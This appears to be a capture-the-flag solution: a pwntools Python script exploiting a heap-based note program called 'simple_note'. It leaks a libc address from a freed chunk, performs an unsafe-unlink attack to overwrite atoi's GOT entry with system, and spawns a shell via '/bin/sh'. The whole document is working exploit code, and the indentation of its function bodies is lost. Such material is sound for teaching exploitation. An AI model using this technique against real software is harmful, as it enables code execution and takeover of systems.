Rating:

```python
from pwn import *
from sys import argv
import time

context(os='linux', arch='amd64', log_level='info')
FILE_NAME = './simple_note'
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

r = process(FILE_NAME)

#wrapper function
def add_new_note(size, note):
r.sendafter("Your choice:", "1")
r.sendafter("Please input the size:", str(size))
r.sendafter("Please input your note:", note)

def delete_the_note(index):
r.sendafter("Your choice:", "2")
r.sendafter("Please input the index:", str(index))

def show_the_note(index):
r.sendafter("Your choice:", "3")
r.sendafter("Please input the index: \n", str(index))
return r.recvuntil(b"\n===", drop=True)

def edit_the_note(index, note):
r.sendafter("Your choice:", "4")
r.sendafter("Please input the index:", str(index))
r.sendafter("Please input your note:", note)

def exit_simple_note():
r.sendafter("Your choice:", "5")

getListAddr = lambda i: i * 8+0x6020c0
got_atoi = 0x602058

def main():
#leak
add_new_note(0x88, "A"*0x88) #0
add_new_note(0x88, "B"*0x88) #1
add_new_note(0x88, "C"*0x88) #2
add_new_note(0x88, "D"*0x88) #3
add_new_note(0x88, "E"*0x88) #4
delete_the_note(0)
add_new_note(0x88, "X"*8) #0
leak = u64(show_the_note(0)[-6:].ljust(8, b"\x00"))

#calc libc
libc_base = leak - 0x3c4b78 #libc_base - (main_arena + 88) = 0x3c4b78
fun_system = libc_base + libc.symbols[b"system"]
log.info("libc_base: 0x{0:x}".format(libc_base))
log.info("system: 0x{0:x}".format(fun_system))

#unsafe unlink attack
payload = p64(0) + p64(0x81) #prev_size, size
payload += p64(getListAddr(0)) #fb = list[0]
payload += p64(getListAddr(1)) #bk = list[1]
payload = payload.ljust(0x80, b"X")
payload += p64(0x80) #prev_size
payload += b"\x90" #size + freed_flag

edit_the_note(3, payload)
delete_the_note(4) #unlink

# write system addr
edit_the_note(3, p64(got_atoi))
edit_the_note(0, p64(fun_system))
r.sendafter("Your choice:", "/bin/sh\x00")
r.interactive()

if __name__ == '__main__':
main()

```
```